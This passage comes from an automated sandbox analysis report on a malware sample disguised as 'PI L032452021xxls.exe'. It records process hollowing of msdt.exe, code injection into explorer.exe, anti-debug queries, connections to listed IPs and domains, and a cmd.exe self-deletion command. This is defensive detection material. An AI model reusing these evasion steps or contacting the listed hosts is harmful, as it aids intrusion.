          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05188CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0517131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0518070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0518070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05188B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05188F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05137794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05137794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05137794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0516D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0517138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05185BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0516FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05144257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0516B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0516B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05188A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05180EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05180EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05180EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05188ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0516FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.karnez.net
          Source: C:\Windows\explorer.exeDomain query: www.vdvppt.club
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 1010000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeMemory written: C:\Users\user\Desktop\PI L032452021xxls.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe C:\Users\user\Desktop\PI L032452021xxls.exe
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess created: C:\Users\user\Desktop\PI L032452021xxls.exe C:\Users\user\Desktop\PI L032452021xxls.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PI L032452021xxls.exe'
          Source: explorer.exe, 00000007.00000000.461811361.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000011.00000002.624103689.0000000003900000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.461811361.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000011.00000002.624103689.0000000003900000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.461811361.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000011.00000002.624103689.0000000003900000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000007.00000000.461811361.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000011.00000002.624103689.0000000003900000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Users\user\Desktop\PI L032452021xxls.exe VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
